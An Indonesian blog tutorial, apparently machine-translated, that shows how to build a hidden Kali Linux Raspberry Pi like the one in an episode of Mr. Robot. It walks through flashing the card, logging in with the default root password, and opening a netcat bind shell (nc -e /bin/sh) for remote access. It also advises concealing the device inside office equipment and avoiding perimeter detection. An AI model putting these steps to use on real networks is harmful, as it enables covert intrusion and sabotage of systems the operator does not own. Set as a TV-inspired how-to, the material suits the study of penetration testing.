Cara Hacking Raspberry Pi Mr. Robot

Mr Robot adalah tentang seorang pemuda dengan hati nurani sosial (dengan kecemasan sosial yang parah dan kebiasaan morfin jahat) yang bekerja di keamanan maya siang hari, melindungi jaringan Evil Corporation, sementara di malam hari, adalah seorang perwira hacker untuk selamanya. akhirnya, dia akan direkrut oleh sebuah organisasi hacker yang dikenal sebagai fsociety (yang terlihat dan bertindak seperti Anonymous) untuk menjatuhkan Evil Corporation.

Image result for mr robot

Salah satu bagian yang lebih menarik dari pertunjukan, dari sudut pandang saya, adalah bahwa peretasan itu realistis. Tidak ada virus animasi yang berputar-putar seperti di banyak acara TV dan film lainnya, tapi juga perintah yang bagus dari Linux.

The Hacking Raspberry Pi

Dalam episode 4, Elliott, karakter utamanya, berencana menggunakan Raspberry Pi untuk mengendalikan sistem pemanas ruang penyimpanan tempat Evil Corp menyimpan backup tape mereka. Jika mereka bisa menaikkan suhu di ruang penyimpanan, itu akan membuat backup tape tidak bisa digunakan.

Pada backup tape ini adalah catatan 70% dari hutang konsumen di dunia, termasuk pinjaman mahasiswa miliaran dolar. Peretas percaya bahwa jika mereka dapat menghancurkan rekaman tersebut, jutaan orang akan bebas dari pinjaman mahasiswa dan hutang konsumen yang dimiliki oleh Evil Corp.

Dalam tutorial ini, saya akan menunjukkan cara membuat hacking Raspberry Pi yang dapat dikontrol dari jarak jauh, mirip dengan apa Elliott pada Mr. Robot akan digunakan dalam episode ini.

1. Download Versi ARM Kali

Langkah pertama, tentu saja, adalah mendownload versi ARM Kali. Raspberry Pi dan banyak perangkat mobile menggunakan CPU ARM karena harganya lebih hemat energi dan lebih dingin, sehingga sistem operasi Kali harus dikompilasi secara khusus untuk itu.

 

Untungnya, barang di Ofensif Keamanan telah menyediakan ini untuk kita. Arahkan ke halaman download ofensif Security untuk mendapatkan file Raspberry Pi. Setelah Anda mendownload gambarnya, unzip dengan WinRAR, WinZip, atau alat pengarsipan lainnya yang bisa unzip file.

2. Download & Install Win32 Disk Imager

Sekarang kita perlu menginstal Imager Disk Win32, yang bisa Anda download dari SourceForge. Alat ini memungkinkan kita untuk menulis gambar ke kartu SD atau USB drive. Saya merekomendasikan kartu SD cepat minimal 4 GB. Anda bisa membeli 16 GB sekarang sekitar 7 dolar.

3. Jalankan Disk Imager

Sekarang setelah Anda menginstal Disk Imager, klik kanan padanya dan jalankan sebagai “administrator.”

Pilih gambar Kali di jendela “Image File”, arahkan gambar ke kartu SD Anda di jendela “Device”, lalu klik tombol “Tulis”. Bersabarlah, ini bisa terjadi kapan-kapan.

Jika Anda menggunakan Linux, semuanya lebih sederhana. Tidak perlu mendownload apapun. Anda cukup menggunakan perintah dd (antara lain, perintah dd digunakan untuk membuat gambar disk di forensik digital). Jika kita asumsikan gambarnya bernama Kali-RPI.img dan kartu SD ada di / dev / sdc dan kita ingin menyalinnya dalam ukuran blok 512k (bs), maka kita cukup mengetik:

kali >dd if =Kali-RPI.img of = /dev/sdc bs=512k

4. Instal SD Card di Raspberry Pi

Kita perlu mengeluarkan kartu SD dari PC Anda dan sekarang memasang kartu SD ke dalam Raspberry Pi dan boot it up. Saat booting, Anda akan dibawa ke pembukaan kotak perintah yang menanyakan nama pengguna dan kata sandi Anda. Ketik:

Username: root
Kata sandi: toor

Lalu ketik:

Kali> startx

Ini memulai GUI X11 untuk Kali. Keberhasilan! Sekarang Anda memiliki alat hacking Kali kecil yang bisa ditempatkan dimana saja!

Mulai pendengar Cryptcat di Raspberry Pi
Sekarang, saat kita menjalankan Raspberry Pi Kali, kita bisa menempatkannya di manapun dalam jaringan Evil Corporation. Raspberry Pi memiliki koneksi Ethernet dan Anda dapat menambahkan adaptor nirkabel. Pi Raspberry begitu kecil sehingga bisa disembunyikan di banyak tempat. Ini termasuk di dalam komputer desktop, di dalam telepon, jam, dll tanpa diperhatikan.

Setelah terhubung, kita bisa memulai pendengar Netcat (Netcat dibangun ke Kali) di atasnya dengan mengetikkan:

Kali> nc -l -p6996 -e / bin / sh

Ini akan memungkinkan Elliott untuk terhubung ke terminal di Pi Raspberry dari manapun menggunakan port 6996.

Sekarang, Elliott dapat terhubung kembali ke Raspberry Pi dengan menggunakan Netcat pada sistem Kali dan mengetiknya:

Kali> nc 192.168.1.105 6996

Ketika dia mengetik ifconfig, dia dapat melihat bahwa dia memiliki terminal pada Raspberry Pi yang siap melakukan hacking terhadap sistem HVAC Evil Corp! Pastikan untuk menggunakan alamat IP dari Raspberry Pi di lingkungan Anda.

Tentu saja, ada metode lain untuk menghubungkan kembali ke Raspberry Pi. Dia bisa menggunakan SSH, dan jika dia menginginkan GUI, instal Server VNC dan terhubung kembali dengan kontrol GUI penuh di Kali. Masalah dengan kedua metode tersebut adalah bahwa mereka lebih mungkin terdeteksi oleh pertahanan jaringan perimeter Evil Corporation.

6. Wreak Havoc

Sekarang Elliott memiliki instalasi Kali dalam jaringan Evil Corporation, dia harus bisa menggunakan banyak alat yang tersedia untuk mendatangkan malapetaka pada Evil Corporation di Kali. Di episode 4, dia ingin mengendalikan sistem HVAC dan menyalakan panas untuk mencairkan kaset cadangan. Dia harus bisa melakukan itu sekarang karena ia telah menyisipkan Kali dalam jaringan Evil Corporation.

Seiring pertunjukan ini berlanjut dan Elliott menunjukkan lebih banyak hacks, saya akan mencoba membuat Anda memikirkan bagaimana dia melakukannya, saat saya mencoba menunjukkan kepada Anda hacks Mr. Robot.

 

Rich Snippets
Published
Article
Cara Hacking Raspberry Pi Mr. Robot
Ratings
51star1star1star1star1star
Azizul Hakim

Satu-satunya sumber pengetahuan adalah pengalaman

Leave a Reply